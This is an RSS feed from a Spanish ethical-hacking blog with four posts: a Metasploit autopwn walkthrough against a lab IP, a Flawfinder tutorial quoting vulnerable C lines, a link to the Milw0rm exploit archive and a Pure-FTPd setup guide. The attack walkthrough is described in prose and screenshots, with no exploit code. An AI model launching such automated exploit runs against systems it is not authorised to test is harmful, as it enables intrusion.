<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Back Track World 2008</title>
	<atom:link href="http://backtrackworld.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://backtrackworld.wordpress.com</link>
	<description>Ethical Hacking</description>
	<lastBuildDate>Tue, 09 Dec 2008 13:52:51 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='backtrackworld.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Back Track World 2008</title>
		<link>http://backtrackworld.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://backtrackworld.wordpress.com/osd.xml" title="Back Track World 2008" />
	<atom:link rel='hub' href='http://backtrackworld.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Como usar el Metasploit Framework 3 en linux &#8220;Por RooT@Aquiles:~#&#8221;</title>
		<link>http://backtrackworld.wordpress.com/2008/09/12/como-usar-el-metasploit-framework-3-en-linux-el-divino-aquiles/</link>
		<comments>http://backtrackworld.wordpress.com/2008/09/12/como-usar-el-metasploit-framework-3-en-linux-el-divino-aquiles/#comments</comments>
		<pubDate>Fri, 12 Sep 2008 07:33:16 +0000</pubDate>
		<dc:creator>root@Aquiles:~#</dc:creator>
				<category><![CDATA[Auditorias]]></category>
		<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Penetración]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://backtrackworld.wordpress.com/?p=55</guid>
		<description><![CDATA[Bueno antes de nada esta &#8220;suite&#8221; está diseñada para realizar distintos tipos de ataques, esta herramienta es tan grande y complicada que solo veremos un ataque automatizado que es como lo mejor que aparentemente tiene, se llama auto_pwn o ninja como por ahi dicen. Bueno lo primero es abrir &#8220;msfconsole&#8221;, para ello nos vamos a [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=55&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Bueno antes de nada esta &#8220;suite&#8221; está diseñada para realizar distintos tipos de ataques, esta herramienta es tan grande y complicada que solo veremos un ataque automatizado que es como lo mejor que aparentemente tiene, se llama auto_pwn o ninja como por ahi dicen.</p>
<p>Bueno lo primero es abrir &#8220;msfconsole&#8221;, para ello nos vamos a la carpeta &#8220;/pentest/exploits/framework3&#8243;</p>
<p>y ejecutamos msfconsole:</p>
<p><a href="http://backtrackworld.files.wordpress.com/2008/09/1.png"><img class="alignnone size-full wp-image-58" title="1" src="http://backtrackworld.files.wordpress.com/2008/09/1.png?w=658&#038;h=430" alt="" width="658" height="430" /></a></p>
<p>Ya ireis viendo que tiene muchisimas opciones, hoy os enseñaré como funciona autopwn o ninja.</p>
<p>Primero tendremos que crear una base de datos donde guardemos toda la información del objetivo.</p>
<p>Para ello tenemos que cargar el módulo con el comando load db_sqlite3</p>
<p><a href="http://backtrackworld.files.wordpress.com/2008/09/2.png"><img class="alignnone size-full wp-image-59" title="2" src="http://backtrackworld.files.wordpress.com/2008/09/2.png?w=656&#038;h=429" alt="" width="656" height="429" /></a></p>
<p>Una vez tenemos cargado el módulo, debemos crear una base de datos y conectarnos a ella, para eso utilizamos el comando &#8220;db_create aquiles&#8221; por ejemplo.</p>
<p>Luego crea la base y se conecta a ella</p>
<p><a href="http://backtrackworld.files.wordpress.com/2008/09/3.png"><img class="alignnone size-full wp-image-60" title="3" src="http://backtrackworld.files.wordpress.com/2008/09/3.png?w=655&#038;h=429" alt="" width="655" height="429" /></a></p>
<p>Ahora es cuando llega lo bueno, tenemos que rellenar de algúna manera la base de datos que acabamos de crear, utilizaremos nmap para realizar un análisis del objetivo y que este sea guardado en nuestra base, lo haremos con este comando:</p>
<p><a href="http://backtrackworld.files.wordpress.com/2008/09/4.png"><img class="alignnone size-full wp-image-61" title="4" src="http://backtrackworld.files.wordpress.com/2008/09/4.png?w=648&#038;h=424" alt="" width="648" height="424" /></a></p>
<p>Ya tenemos todo para poder comenzar con ninja, solo tenemos que elegir que opciones nos interesan mas, es cuestión de entenderlas y que pueden hacer.</p>
<p><a href="http://backtrackworld.files.wordpress.com/2008/09/5.png"><img class="alignnone size-full wp-image-62" title="5" src="http://backtrackworld.files.wordpress.com/2008/09/5.png?w=643&#038;h=421" alt="" width="643" height="421" /></a></p>
<p>Para este ejemplo utilizaré estas opciones</p>
<p><a href="http://backtrackworld.files.wordpress.com/2008/09/6.png"><img class="alignnone size-full wp-image-63" title="6" src="http://backtrackworld.files.wordpress.com/2008/09/6.png?w=639&#038;h=418" alt="" width="639" height="418" /></a></p>
<p>Ahora es cuando metasploit framework está lanzando todos los exploits contra el objetivo, en este ejemplo no existe vulnerabilidad, como dice en la mitad de la imágen: &#8220;Analysis completed in tal (0 vulns /0 refs)&#8221;</p>
<p>Podríamos sacar de esta práctica que el 192.168.1.65 tiene sus puertos parcheados y no es posible la entrada.</p>
<p><a href="http://backtrackworld.files.wordpress.com/2008/09/7.png"><img class="alignnone size-full wp-image-64" title="7" src="http://backtrackworld.files.wordpress.com/2008/09/7.png?w=640&#038;h=419" alt="" width="640" height="419" /></a></p>
<p>Es muy util a la hora de comprobar rapidamente todos los puertos y servicios que corren dentro de una red con muchos equipos.</p>
<p>Muchas gracias, espero que os ayude, si tenéis dudas o ideas pues comentarlo.</p>
<p>Un saludo!</p>
<p>Fuente &#8211;&gt; <a href="http://backtrackworld.wordpress.com/">El Divino Aquiles</a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/backtrackworld.wordpress.com/55/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/backtrackworld.wordpress.com/55/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/backtrackworld.wordpress.com/55/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/backtrackworld.wordpress.com/55/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/backtrackworld.wordpress.com/55/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/backtrackworld.wordpress.com/55/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/backtrackworld.wordpress.com/55/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/backtrackworld.wordpress.com/55/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/backtrackworld.wordpress.com/55/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/backtrackworld.wordpress.com/55/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/backtrackworld.wordpress.com/55/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/backtrackworld.wordpress.com/55/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/backtrackworld.wordpress.com/55/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/backtrackworld.wordpress.com/55/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/backtrackworld.wordpress.com/55/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/backtrackworld.wordpress.com/55/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=55&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://backtrackworld.wordpress.com/2008/09/12/como-usar-el-metasploit-framework-3-en-linux-el-divino-aquiles/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/35c05793b6bcf899b86d8eef15cfb712?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">root@Aquiles:~#</media:title>
		</media:content>

		<media:content url="http://backtrackworld.files.wordpress.com/2008/09/1.png" medium="image">
			<media:title type="html">1</media:title>
		</media:content>

		<media:content url="http://backtrackworld.files.wordpress.com/2008/09/2.png" medium="image">
			<media:title type="html">2</media:title>
		</media:content>

		<media:content url="http://backtrackworld.files.wordpress.com/2008/09/3.png" medium="image">
			<media:title type="html">3</media:title>
		</media:content>

		<media:content url="http://backtrackworld.files.wordpress.com/2008/09/4.png" medium="image">
			<media:title type="html">4</media:title>
		</media:content>

		<media:content url="http://backtrackworld.files.wordpress.com/2008/09/5.png" medium="image">
			<media:title type="html">5</media:title>
		</media:content>

		<media:content url="http://backtrackworld.files.wordpress.com/2008/09/6.png" medium="image">
			<media:title type="html">6</media:title>
		</media:content>

		<media:content url="http://backtrackworld.files.wordpress.com/2008/09/7.png" medium="image">
			<media:title type="html">7</media:title>
		</media:content>
	</item>
		<item>
		<title>Detectar vulnerabilidades en C y C++ con Flawfinder</title>
		<link>http://backtrackworld.wordpress.com/2008/09/12/detectar-vulnerabilidades-en-c-y-c-con-flawfinder/</link>
		<comments>http://backtrackworld.wordpress.com/2008/09/12/detectar-vulnerabilidades-en-c-y-c-con-flawfinder/#comments</comments>
		<pubDate>Thu, 11 Sep 2008 23:40:50 +0000</pubDate>
		<dc:creator>root@Aquiles:~#</dc:creator>
				<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://backtrackworld.wordpress.com/?p=53</guid>
		<description><![CDATA[Hacer funcionar flawfinder Hacer funcionar flawfinder es tan sencillo como invocar el comando con el directorio o los nombres de los archivos que se van a procesar. Si se indica un directorio, se procesarán todos los archivos que se encuentren y que se reconozcan como archivos fuente en ese directorio. Además de proporcionar al programa [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=53&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<h2>Hacer funcionar flawfinder</h2>
<p>Hacer funcionar flawfinder es tan sencillo como invocar el comando con el directorio o los nombres de los archivos que se van a procesar. Si se indica un directorio, se procesarán todos los archivos que se encuentren y que se reconozcan como archivos fuente en ese directorio.</p>
<p>Además de proporcionar al programa una lista de archivos o directorios, hay varias opciones de la línea de comandos que se utilizan para controlar el comportamiento de las herramientas.</p>
<p>Las opciones se explican al detalle en la página del manual, pero hay opciones particularmente útiles que usaremos en el ejemplo:</p>
<ul>
<li>&#8211;minlevel=X
<ul>
<li>Define como X el nivel mínimo de riesgo para que se incluya en la salida. El rango válido es de 1 a 5, siendo 1 «bajo riesgo» y 5 «alto riesto».</li>
</ul>
</li>
<li>&#8211;html
<ul>
<li>Formatea la salida como HTML en lugar de como texto sencillo.</li>
</ul>
</li>
<li>&#8211;context
<ul>
<li>Muestra el contexto, por ejemplo, la línea que tiene la potencial debilidad.</li>
</ul>
</li>
</ul>
<p>Para producir un archivo HTML con el resultado de nuestro programa, teniendo en cuenta sólo las funciones de «alto riesgo», tendríamos que teclear algo como esto:</p>
<pre>flawfinder --html --context --minlevel=4 test.c &gt; output.html</pre>
<h2>El resultado</h2>
<p>Al hacer funcionar flawfinder sobre nuestro <a href="http://ftp.spnet.net/debian-www/debian.org/security/audit/examples/test.c.html">código de ejemplo</a>, se produce la siguiente salida <em>(Nota del traductor: se mantiene la salida literal del comando, que es en inglés)</em>:</p>
<hr />
<div class="sampleblock">
<p>Examining test.c</p>
<ul>
<li>test.c:18: <strong> [4] </strong> (buffer) <em> strcpy:   Does not check for buffer overflows when copying to destination.   Consider using strncpy or strlcpy (warning, strncpy is easily misused). </em>
<pre>      strcpy( dir, argv[ 1 ] );</pre>
</li>
<li>test.c:24: <strong> [4] </strong> (buffer) <em> sprintf:   Does not check for buffer overflows. Use snprintf or vsnprintf. </em>
<pre>	sprintf( dir, "%s", getenv( "HOME" ) );</pre>
</li>
<li>test.c:33: <strong> [4] </strong> (shell) <em> popen:   This causes a new program to execute and is difficult to use safely.   try using a library call that implements the same functionality if   available. </em>
<pre>    fp = popen( cmd, "r" );</pre>
</li>
<li>test.c:42: <strong> [4] </strong> (format) <em> printf:   If format strings can be influenced by an attacker, they can be   exploited. Use a constant for the format specification. </em>
<pre>      printf( buff );</pre>
</li>
</ul>
<p>Number of hits = 4<br />
Number of Lines Analyzed = 48 in 0.53 seconds (1392 lines/second)</p></div>
<hr />
<h2>Comprender la salida</h2>
<p>Al igual que ocurría con la salida de <a href="http://ftp.spnet.net/debian-www/debian.org/security/audit/examples/RATS">RATS</a>, este informe es es muy fácil de leer. Muestra claramente las funciones que se han detectado como potencialmente peligrosas, así como la descripción del problema.</p>
<p>También es muy útil la inclusión de información de contexto, porque así se concentra la atención inmediatamente sobre los puntos de interés y se evita considerar otros que no son tan válidos.</p>
<p>El análisis del <a href="http://ftp.spnet.net/debian-www/debian.org/security/audit/examples/test.c">código de nuestro ejemplo</a> es bastante inteligente, puesto que no avisa de <em>todas</em> las funciones <tt>strcpy</tt> problemáticas, sino sólo de la que piensa que podría ser potencialmente peligrosa.</p>
<p>De esta forma, ha conseguido resaltar todas las debilidades de nuestro código sin dar lugar a falsos positivos.</p>
<p>Fuente &#8211;&gt; <a href="http://ftp.spnet.net/debian-www/debian.org/security/audit/examples/flawfinder">Debian</a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/backtrackworld.wordpress.com/53/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/backtrackworld.wordpress.com/53/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/backtrackworld.wordpress.com/53/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/backtrackworld.wordpress.com/53/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/backtrackworld.wordpress.com/53/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/backtrackworld.wordpress.com/53/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/backtrackworld.wordpress.com/53/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/backtrackworld.wordpress.com/53/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/backtrackworld.wordpress.com/53/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/backtrackworld.wordpress.com/53/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/backtrackworld.wordpress.com/53/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/backtrackworld.wordpress.com/53/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/backtrackworld.wordpress.com/53/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/backtrackworld.wordpress.com/53/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/backtrackworld.wordpress.com/53/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/backtrackworld.wordpress.com/53/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=53&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://backtrackworld.wordpress.com/2008/09/12/detectar-vulnerabilidades-en-c-y-c-con-flawfinder/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/35c05793b6bcf899b86d8eef15cfb712?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">root@Aquiles:~#</media:title>
		</media:content>
	</item>
		<item>
		<title>Exploits Vulnerabilidades Shellcodes Videos&#8230; todo en Milw0rm</title>
		<link>http://backtrackworld.wordpress.com/2008/09/12/exploits-vulnerabilidades-shellcodes-videos-todo-en-milw0rm/</link>
		<comments>http://backtrackworld.wordpress.com/2008/09/12/exploits-vulnerabilidades-shellcodes-videos-todo-en-milw0rm/#comments</comments>
		<pubDate>Thu, 11 Sep 2008 22:07:29 +0000</pubDate>
		<dc:creator>root@Aquiles:~#</dc:creator>
				<category><![CDATA[Backdoors]]></category>
		<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Penetración]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://backtrackworld.wordpress.com/?p=51</guid>
		<description><![CDATA[Milw0rm, una página que alberga en su interior una enorme cantidad de exploits para aprovechar todas las vulneraibilidades existentes. Una web muy curiosa donde se pueden aprender grandes cosas. Un saludo<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=51&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:center;"><a class="aligncenter" title="Milw0rm" href="http://www.milw0rm.com/" target="_blank"><img class="aligncenter" src="http://www.milw0rm.com/images/milw0rm-wi.jpg" alt="milw0rm" /></a></p>
<p>Milw0rm, una página que alberga en su interior una enorme cantidad de exploits para aprovechar todas las vulneraibilidades existentes.</p>
<p>Una web muy curiosa donde se pueden aprender grandes cosas.</p>
<p>Un saludo</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/backtrackworld.wordpress.com/51/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/backtrackworld.wordpress.com/51/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/backtrackworld.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/backtrackworld.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/backtrackworld.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/backtrackworld.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/backtrackworld.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/backtrackworld.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/backtrackworld.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/backtrackworld.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/backtrackworld.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/backtrackworld.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/backtrackworld.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/backtrackworld.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/backtrackworld.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/backtrackworld.wordpress.com/51/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=51&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://backtrackworld.wordpress.com/2008/09/12/exploits-vulnerabilidades-shellcodes-videos-todo-en-milw0rm/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/35c05793b6bcf899b86d8eef15cfb712?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">root@Aquiles:~#</media:title>
		</media:content>

		<media:content url="http://www.milw0rm.com/images/milw0rm-wi.jpg" medium="image">
			<media:title type="html">milw0rm</media:title>
		</media:content>
	</item>
		<item>
		<title>Montando un servidor FTP &#8220;Pure-FTPd&#8221; en Linux</title>
		<link>http://backtrackworld.wordpress.com/2008/09/11/montando-un-servidor-ftp-pure-ftpd-en-linux/</link>
		<comments>http://backtrackworld.wordpress.com/2008/09/11/montando-un-servidor-ftp-pure-ftpd-en-linux/#comments</comments>
		<pubDate>Thu, 11 Sep 2008 12:54:53 +0000</pubDate>
		<dc:creator>root@Aquiles:~#</dc:creator>
				<category><![CDATA[Misc]]></category>

		<guid isPermaLink="false">http://backtrackworld.wordpress.com/?p=48</guid>
		<description><![CDATA[Introducción Pure-FTPd es un servidor FTP libre (GPL) basado en Troll-FTPd. Fue modificado por Frank Dennis por razones de seguridad y funcionalidad. Los principales objetivos de este servidor FTP son la eficiencia, la seguridad y la facilidad de uso. Está diseñado para ser seguro en su configuración por defecto; no tiene buffer overflows conocidos y [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=48&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<h2>Introducción</h2>
<p><img src="http://www.pureftpd.org/images/pure-ftpd.png" alt="" /> Pure-FTPd es un servidor FTP libre (GPL) basado en Troll-FTPd. Fue modificado          por Frank Dennis por razones de seguridad y funcionalidad.</p>
<p>Los principales objetivos de este servidor FTP son la eficiencia, la seguridad          y la facilidad de uso. Está diseñado para ser seguro en su configuración          por defecto; no tiene buffer overflows conocidos y es muy sencillo de          instalar. Ha sido diseñado para los kernels modernos, y ha sido portado          con éxito a Linux, FreeBSD, NetBSD, OpenBSD, BSDi, Solaris, Darwin, Tru64,          Irix y HPUX.</p>
<h2>Compilación e instalación de Pure-FTPd</h2>
<p>Lo primero de todo será bajarnos el último fuente, actualmente es la versión          1.0.12. El fichero a bajar será <a href="http://prdownloads.sourceforge.net/pureftpd/pure-ftpd-1.0.12.tar.gz">pure-ftpd-1.0.12.tar.gz</a>.</p>
<p>Una vez bajado haremos lo de siempre:</p>
<pre>% tar zxvf pure-ftpd-1.0.12.tar.gz
% cd pure-ftpd-1.0.12
% ./configure --with-puredb --with-throttling --with-language=spanish --with-ftpwho
% make</pre>
<table class="ex" border="1">
<tbody>
<tr>
<td><em>&#8211;with-puredb</em></td>
<td>Nos permite crear usuarios virtuales para el FTP.</td>
</tr>
<tr>
<td><em>&#8211;with-throttling</em></td>
<td>Para poder limitar el ancho de banda.</td>
</tr>
<tr>
<td><em>&#8211;with-language=spanish</em></td>
<td>Soporte en castellano de los mensajes del servidor.</td>
</tr>
<tr>
<td><em>&#8211;with-ftpwho</em></td>
<td>Nos permite ver quien está conectado.</td>
</tr>
</tbody>
</table>
<p>Ahora nos hacemos root con el comando <strong>su</strong> para poder realizar la          instalacio&#8217;n en el sistema:</p>
<pre># make install</pre>
<p>Ya tenemos instalado pure-ftpd. Ahora nos falta lo más importante, que          es la configuración y la puesta en marcha.</p>
<h2>Configuración y puesta en marcha</h2>
<p>pure-ftpd es configurable a través de la linea de comandos, es decir,          a la hora de arrancar el servidor le pasamos como parámetros las opciones          que queramos.</p>
<p>Tenemos también otra opción que es editar el fichero <em>/etc/pureftpd.conf</em>,          y con el script <em>pure-config.pl</em> que acompaña el programa.</p>
<h3>Opciones disponibles</h3>
<pre># /usr/local/sbin/pure-ftpd &lt;opciones&gt;</pre>
<table class="ex" border="1">
<tbody>
<tr>
<td>-A</td>
<td>chroot para todos los usuarios. No pueden salir del directorio                  del FTP.</td>
</tr>
<tr>
<td>-c 10</td>
<td>10 conexiones máximas al FTP.</td>
</tr>
<tr>
<td>-B</td>
<td>Ejecutar en segundo plano.</td>
</tr>
<tr>
<td>-C 2</td>
<td>Permitir solamente 2 conexiones para una misma IP.</td>
</tr>
<tr>
<td>-d</td>
<td>Verbose log.</td>
</tr>
<tr>
<td>-E</td>
<td>No permitir usuario anonymous.</td>
</tr>
<tr>
<td>-f ftp</td>
<td>Logear a través de syslog.</td>
</tr>
<tr>
<td>-H</td>
<td>No resolver IP.</td>
</tr>
<tr>
<td>-I 15</td>
<td>Si el usuario está 15 minutos inactivo, es desconectado</td>
</tr>
<tr>
<td>-L 2000:8</td>
<td>Límite de recursividad.</td>
</tr>
<tr>
<td>-m 3</td>
<td>Máxima carga por encima de la cual el servidor deja de funcionar.</td>
</tr>
<tr>
<td>-s</td>
<td>Antiwarez.</td>
</tr>
<tr>
<td>-U 133:022</td>
<td>umask</td>
</tr>
<tr>
<td>-u 100</td>
<td>minuid</td>
</tr>
<tr>
<td>-k 90</td>
<td>Se podrá usar como máximo el 90% de la partición.</td>
</tr>
<tr>
<td>-lpuredb:/etc/pureftpd.pdb</td>
<td>Usaremos usuarios virtuales de FTP en vez de cuentas reales                  del sistema.</td>
</tr>
<tr>
<td>-S hostname_o_ip,puerto</td>
<td>Escuchamos en el puerto especificado de esa IP o Hostname, si                  el equipo tiene varias IPs.</td>
</tr>
</tbody>
</table>
<p><em>*Nota: Para acceder a la lista completa de opciones pulse <a href="http://www.pureftpd.org/README" target="_blank">aquí</a>.</em></p>
<h3>Manejo de usuarios</h3>
<p>Antes de nada añadiremos a nuestro sistema un usuario y grupo llamado          ftp.</p>
<p>Se recomienda utilizar usuarios virtuales en lugar de cuentas del sistema,          por eso hemos habilitado la opción AUTH (-lpuredb:/etc/pureftpd.pdb).          Para manejar los usuarios, utilizaremos la herramienta <em>pure-pw</em>.</p>
<p>Por ejemplo, si queremos añadir al usuario pepe, lo haremos de la siguiente          forma:</p>
<pre># pure-pw useradd pepe -u ftp -g ftp -d /home/ftp/pepito -t 5 -T 10
Password:
# pure-pw mkdb</pre>
<table class="ex" border="1">
<tbody>
<tr>
<td>-u &lt;userid&gt;</td>
<td>User ID</td>
</tr>
<tr>
<td>-g &lt;gid&gt;</td>
<td>Group ID</td>
</tr>
<tr>
<td>-d &lt;directorio&gt;</td>
<td>Directorio al que tiene acceso el usuario</td>
</tr>
<tr>
<td>-t 5</td>
<td>5 Kb/s de límite de ancho de banda de bajada</td>
</tr>
<tr>
<td>-T 10</td>
<td>10 Kb/s de límite de ancho de banda de subida</td>
</tr>
</tbody>
</table>
<p>Una vez introducido el password, lo siguiente que hemos hecho ha sido          actualizar la base de datos /etc/pureftpd.pdb para que los cambios surtan          efecto.</p>
<p>Para eliminar y modificar usuarios usaremos respectivamente las opciones          <em>userdel</em> y <em>usermod</em> de la herramienta <em>pure-pw</em>. El manejo          es muy intuitivo y sencillo, así que con la ayuda en linea del propio          programa es suficiente.</p>
<h3>Configuración de Ratios</h3>
<p>Aunque personalmente odie los ratios, no por eso voy a dejar de explicar          como usarlos con pure-ftpd.</p>
<p>Los ratios se usan para obligar a los usuarios a dejar algún fichero de          <em>X</em> megas en el FTP para poder bajar <em>Y</em> megas. Para activar          los ratios usaremos la opción <em>-q X:Y</em> (upload:download).</p>
<h3>Banners y mensajes de bienvenida</h3>
<p>Si en el directorio raíz del ftp grabamos un fichero de nombre <em>.banner</em>,          de tamaño no superior a 4000 bytes, éste será impreso por pantalla cuando          el usuario acceda al FTP. En cada directorio tambien podemos grabar un          fichero <em>.message</em> para que sea impreso cada vez que el usuario accede          al directorio.</p>
<h3>Permitiendo Uploads</h3>
<p>La problemática del directorio upload es que, al tener permiso de escritura,          en principio los usuarios pueden borrar los ficheros, usar el directorio          para intercambiar warez, etc. Esto lo podemos evitar estableciendo permisos          de escritura y ejecución al directorio pero no de lectura (drwx-wx-wx),          con <em>chmod 333</em>.</p>
<p>Otra posibilidad es arrancar el servidor pure-ftpd con la opcion -U 777:777,          de forma que los ficheros que suban los usuarios tendrán permisos &#8212;&#8212;&#8212;-.          De esta forma no podrán ser descargados.</p>
<p>Fuente &#8211;&gt; <a href="http://www.linuxdata.com.ar/index.php?idmanual=ftpsers.htm&amp;manuale=1">Linux Data</a></p>
<p>Autor: <span style="color:#000000;"><em>Francisco Gaytán Muñoz.</em></span></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/backtrackworld.wordpress.com/48/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/backtrackworld.wordpress.com/48/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/backtrackworld.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/backtrackworld.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/backtrackworld.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/backtrackworld.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/backtrackworld.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/backtrackworld.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/backtrackworld.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/backtrackworld.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/backtrackworld.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/backtrackworld.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/backtrackworld.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/backtrackworld.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/backtrackworld.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/backtrackworld.wordpress.com/48/" /></a> <img alt="" 